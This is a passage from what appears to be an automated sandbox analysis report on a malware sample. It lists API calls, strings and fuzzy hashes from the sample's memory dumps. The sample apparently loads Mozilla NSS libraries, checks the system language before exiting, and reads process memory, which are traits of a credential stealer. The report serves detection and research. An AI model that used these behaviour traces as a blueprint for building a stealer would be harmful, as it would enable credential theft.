SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6BBB84B9
SECKEY_DestroyPublicKey.NSS3(?), ref: 6BBB84CA
PR_GetCurrentThread.NSS3 ref: 6BBB84D2
PR_SetError.NSS3(FFFFE064,00000000), ref: 6BBB8525

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Error$Alloc_DestroyFlagsGenerateItem_K11_PairWith$AllocArenaCurrentFindMark_PrivatePublicTag_ThreadZfreefreememcpy
String ID:
API String ID: 1252757470-0
Opcode ID: 4b528ed2e6cf99a452d1f57b11d30f26bd489511ef8784c3c9309d3250855c62
Instruction ID: b5044ef7106d839f8bbdbd773870a5f565c34530d607b33731cb98371200e8f3
Opcode Fuzzy Hash: 4b528ed2e6cf99a452d1f57b11d30f26bd489511ef8784c3c9309d3250855c62
Instruction Fuzzy Hash: 5B41EF729042826FD6109F78EC82B3F73E8EF41614F048568ED59C7292EB39E904C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB84340 Relevance: 13.6, APIs: 9, Instructions: 97COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB8436C
SECMOD_DestroyModule.NSS3(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB84388
SECMOD_DestroyModule.NSS3(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB843B4
free.MOZGLUE(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB843BD
SECMOD_DestroyModule.NSS3(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB843EC
free.MOZGLUE(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB843F5
SECMOD_DestroyModule.NSS3(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB84424
free.MOZGLUE(?,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB8442D
PR_SetError.NSS3(FFFFE08B,00000000,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB8445C

Part of subcall function 6BB88780: free.MOZGLUE(?,?,?,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB88790
Part of subcall function 6BB88780: DeleteCriticalSection.KERNEL32(?,?,?,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB887AB
Part of subcall function 6BB88780: free.MOZGLUE(?,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB887B2
Part of subcall function 6BB88780: DeleteCriticalSection.KERNEL32(0000000D,?,?,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB887CD
Part of subcall function 6BB88780: free.MOZGLUE(00000001,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB887D4
Part of subcall function 6BB88780: DeleteCriticalSection.KERNEL32(?,?,?,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB887E7
Part of subcall function 6BB88780: free.MOZGLUE(?,?,6BB3518F,?,-00000001,?,6BB361C4,?,6BB35FA7), ref: 6BB887EE

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: free$DestroyModule$CriticalDeleteSection$Error
String ID:
API String ID: 2814895948-0
Opcode ID: a48141c5e217ce19f7683b9eded7d66e7d60ae64c1caaf4eabcb38770f0e860b
Instruction ID: 346a1e801d56884f19454be4f174dc8532aa11f3204466c54ce2280e17b750c2
Opcode Fuzzy Hash: a48141c5e217ce19f7683b9eded7d66e7d60ae64c1caaf4eabcb38770f0e860b
Instruction Fuzzy Hash: 653188B1A017919BFB10AE64D86170B336CEB1261CF090078D899AB301EB3DE90986E1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBA350 Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 6BBBA830: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BBBA84F
Part of subcall function 6BBBA830: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BBBA873
Part of subcall function 6BBBA830: free.MOZGLUE(?), ref: 6BBBA892

free.MOZGLUE(?,00000000), ref: 6BBBA36C
free.MOZGLUE(?,00000000), ref: 6BBBA380
free.MOZGLUE(?,00000000), ref: 6BBBA394
SECITEM_ZfreeItem_Util.NSS3(000009B0,00000000,00000000), ref: 6BBBA3A7
SECITEM_ZfreeItem_Util.NSS3(00000994,00000000,?,?,?,00000000), ref: 6BBBA3C6
SECITEM_ZfreeItem_Util.NSS3(000009F8,00000000,?,?,?,?,?,00000000), ref: 6BBBA3D6
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,?,?,00000000), ref: 6BBBA3EA
free.MOZGLUE(?,?,?,?,?,?,?,?,00000000), ref: 6BBBA403
free.MOZGLUE(?,?,?,?,?,?,?,?,00000000), ref: 6BBBA417

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Utilfree$Item_Zfree$Arena_Free
String ID:
API String ID: 1754529880-0
Opcode ID: 9628b7b2870c85a6218bc30e6c41539d9d96cf3d90df6ae5e245bbfb4892b58b
Instruction ID: 4a8608160ae8a10273fd9dc2400d204152881ef4217798883e92be7e0a246331
Opcode Fuzzy Hash: 9628b7b2870c85a6218bc30e6c41539d9d96cf3d90df6ae5e245bbfb4892b58b
Instruction Fuzzy Hash: 8921EEF5A0068157DA109B75AC4EE9B7BACAF45249F044938E46ED2101EF39F218CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 6BB20300 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54filewindowCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 6BB20328
GetLastError.KERNEL32 ref: 6BB20347
FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000), ref: 6BB20361
PR_LogPrint.NSS3(md_memmap(): %s,?), ref: 6BB2037A
GetLastError.KERNEL32 ref: 6BB20382
PR_SetError.NSS3(FFFFE896,00000000), ref: 6BB2038E

Strings

md_memmap(): %s, xrefs: 6BB20375

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Error$Last$FileFormatMessagePrintView
String ID: md_memmap(): %s
API String ID: 2029323173-2634054837
Opcode ID: d0893cac0f318f505f199e7381d2fddf38a515d4223c90960343d3cb7c794ce8
Instruction ID: 722526651f0468889427874be54fadbdb3a63679682e7e7b3bb9e9de6eac95e7
Opcode Fuzzy Hash: d0893cac0f318f505f199e7381d2fddf38a515d4223c90960343d3cb7c794ce8
Instruction Fuzzy Hash: 4501D275900204BFEB009F64DC59D7F7B78EF8A315B408119F91A9B240EA30EE04CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041884F

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__amsg_exit.LIBCMT ref: 0041886F
__lock.LIBCMT ref: 0041887F
InterlockedDecrement.KERNEL32(?), ref: 0041889C
_free.LIBCMT ref: 004188AF
InterlockedIncrement.KERNEL32(00423530), ref: 004188C7

Strings

05B, xrefs: 004188B5, 004188BD

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 6BC42B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,.dll), ref: 6BC42B81
PR_smprintf.NSS3(%s%s,?,.dll), ref: 6BC42B98
PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6BC42BB4
PR_smprintf.NSS3(6BC6AAF9,?), ref: 6BC42BC4

Strings

%s\%s, xrefs: 6BC42B93
.dll, xrefs: 6BC42B7B, 6BC42BA8, 6BC42BCE
%s\%s%s, xrefs: 6BC42BAF

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: R_smprintf$strstr
String ID: %s\%s$%s\%s%s$.dll
API String ID: 3360132973-3501675219
Opcode ID: 19bed6563a07d46c0cfa64b8ac382189882b141b4248381d2dd2f180e9ca1019
Instruction ID: 0efea27e0640465d5b0de365f156d11328c710134b3a64757763ccf5d0fc48e4
Opcode Fuzzy Hash: 19bed6563a07d46c0cfa64b8ac382189882b141b4248381d2dd2f180e9ca1019
Instruction Fuzzy Hash: 33F0823683546435491418AAAD57D9B7F1DDCD26E4B0400BEBD2EEE101B75D934080F2

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
ExitProcess.KERNEL32 ref: 00413465
ExitProcess.KERNEL32 ref: 0041346F
ExitProcess.KERNEL32 ref: 00413479
ExitProcess.KERNEL32 ref: 00413483
ExitProcess.KERNEL32 ref: 0041348D

Strings

*, xrefs: 0041344C

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65

Uniqueness

Uniqueness Score: -1.00%

Function 6BB3C310 Relevance: 12.1, APIs: 8, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?), ref: 6BB3C350

Part of subcall function 6BB8F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6BB8F0C8
Part of subcall function 6BB8F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6BB8F122

SECOID_FindOIDByTag_Util.NSS3(00000112), ref: 6BB3C370

Part of subcall function 6BB90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB908B4

PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6BB3C382

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

PORT_ArenaAlloc_Util.NSS3(?,00000010), ref: 6BB3C3A2
SECITEM_CopyItem_Util.NSS3(?,00000000,00000000), ref: 6BB3C3C4
PR_SetError.NSS3(FFFFE013,00000000), ref: 6BB3C3D7
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB3C3E8
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6BB3C403

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena$Alloc_Error$Arena_FreeItem_Value$AllocateCopyCriticalEncodeEnterFindSectionTag_Unlock
String ID:
API String ID: 3741910392-0
Opcode ID: 5b0b1d6a66277645309b95d2fab570cf31762fbc17caf4c942a90997ea0acfb8
Instruction ID: 75741f767cb3b30c6ba5a9cffc4f1535878bc408cafcb00109134618db3e86d6
Opcode Fuzzy Hash: 5b0b1d6a66277645309b95d2fab570cf31762fbc17caf4c942a90997ea0acfb8
Instruction Fuzzy Hash: D031D475A443A19FF7009FA8DC41B6A77A4EF05708F154168EC14AB3D1EB7AE814CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BB2AB70 Relevance: 12.1, APIs: 8, Instructions: 104pipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 6BB2ABAF
GetLastError.KERNEL32 ref: 6BB2AC44
PR_SetError.NSS3(FFFFE896,00000000), ref: 6BB2AC50

Part of subcall function 6BBDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BBDC2BF

PR_SetError.NSS3(FFFFE890,00000000), ref: 6BB2AC62
CloseHandle.KERNEL32(?), ref: 6BB2AC75
CloseHandle.KERNEL32(?), ref: 6BB2AC7A

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Error$CloseHandle$CreateLastPipeValue
String ID:
API String ID: 4247729451-0
Opcode ID: e64558705b926e42407fce06feca22453699416214afc02fc46229b4159272b1
Instruction ID: afc28907c66db8f92d0675bb7c101e96e72fdda3191b53074a82a2e64cd1d696
Opcode Fuzzy Hash: e64558705b926e42407fce06feca22453699416214afc02fc46229b4159272b1
Instruction Fuzzy Hash: 13318C759001059FEB14DFA8DC8996EBBF4FF4A304B258068E9099B361D739ED41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6BB54BA0 Relevance: 12.1, APIs: 8, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6BB5A6A2,?,?,00000000), ref: 6BB54BB9
EnterCriticalSection.KERNEL32 ref: 6BB54BD2
TlsGetValue.KERNEL32 ref: 6BB54BEF
EnterCriticalSection.KERNEL32 ref: 6BB54C08
PL_HashTableLookup.NSS3 ref: 6BB54C21
PR_Unlock.NSS3 ref: 6BB54C2E
PR_Now.NSS3 ref: 6BB54C3D
PR_Unlock.NSS3 ref: 6BB54C62

Part of subcall function 6BB207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BAB204A), ref: 6BB207AD
Part of subcall function 6BB207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BAB204A), ref: 6BB207CD
Part of subcall function 6BB207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BAB204A), ref: 6BB207D6
Part of subcall function 6BB207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BAB204A), ref: 6BB207E4
Part of subcall function 6BB207A0: TlsSetValue.KERNEL32(00000000,?,6BAB204A), ref: 6BB20864
Part of subcall function 6BB207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BB20880
Part of subcall function 6BB207A0: TlsSetValue.KERNEL32(00000000,?,?,6BAB204A), ref: 6BB208CB
Part of subcall function 6BB207A0: TlsGetValue.KERNEL32(?,?,6BAB204A), ref: 6BB208D7
Part of subcall function 6BB207A0: TlsGetValue.KERNEL32(?,?,6BAB204A), ref: 6BB208FB

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 8494632d74401d74c36507eeea2b4575e0b9f8c3b5ba009703bacb55cd499593
Instruction ID: 4d3c4d471b2f2bf102d186d250689b292d2148608c5fb15cabb4d58bd0f21b38
Opcode Fuzzy Hash: 8494632d74401d74c36507eeea2b4575e0b9f8c3b5ba009703bacb55cd499593
Instruction Fuzzy Hash: 55315EB5904A419FDB00EF38C08546EBBF4FF49354B018A69DC9987314EB34E9A0CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB88B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB88B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6BB88BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6BB88D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB88D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6BB88D72

Strings

OID., xrefs: 6BB88BA4

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: OID.
API String ID: 4247295491-3585844982
Opcode ID: 3f07149ca0a9bf7cf23b0aad412af2df698b581fb62566462ea9c60d910fb60c
Instruction ID: 3ffab941300e1620c1f5352e818bf00db07d068f139ba042301eb07539c1908d
Opcode Fuzzy Hash: 3f07149ca0a9bf7cf23b0aad412af2df698b581fb62566462ea9c60d910fb60c
Instruction Fuzzy Hash: 9B5139B1F011A94BDB20CA18CC8079EB3A6EF55354F0045EDE919DB386E3789E858F94

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7C3D0 Relevance: 10.7, APIs: 7, Instructions: 158COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6BB7C52A

Part of subcall function 6BB7BD40: PK11_DoesMechanism.NSS3(?,?,?,?,?,?,?,6BB5CEEA,?,?,00000001,?), ref: 6BB7BD6C

PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6BB7C45D
TlsGetValue.KERNEL32 ref: 6BB7C494
EnterCriticalSection.KERNEL32(?), ref: 6BB7C4A9
PR_Unlock.NSS3(?), ref: 6BB7C4F4
PK11_FreeSymKey.NSS3(?), ref: 6BB7C512
PK11_FreeSymKey.NSS3(?), ref: 6BB7C554

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: K11_$Free$CriticalDoesEnterErrorImportMechanismPublicSectionUnlockValue
String ID:
API String ID: 3021776597-0
Opcode ID: bdeacddf35db5387f808096777403ead5f51066d79fa04a68cdb5b4ac60e10e5
Instruction ID: b5161d3750f0cdf174a397c7958934c452e3b680fcf1ddaeb3dc81243267fdcc
Opcode Fuzzy Hash: bdeacddf35db5387f808096777403ead5f51066d79fa04a68cdb5b4ac60e10e5
Instruction Fuzzy Hash: 4451A771D002499FEB10EF69DC81BAEB7B8FF49314F144079E915A7241E735EA50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00413BC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00413BDF
??_U@YAPAXI@Z.MSVCRT ref: 00413C0D

Part of subcall function 00413890: strlen.MSVCRT ref: 004138A1
Part of subcall function 00413890: strlen.MSVCRT ref: 004138C5

VirtualQueryEx.KERNEL32(00413FCD,00000000,?,0000001C), ref: 00413C52
??_V@YAXPAX@Z.MSVCRT ref: 00413D73

Part of subcall function 00413AA0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00413AB8

Strings

Z>A, xrefs: 00413C38, 00413C3B
@, xrefs: 00413C66

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @$Z>A
API String ID: 2950663791-2427737632
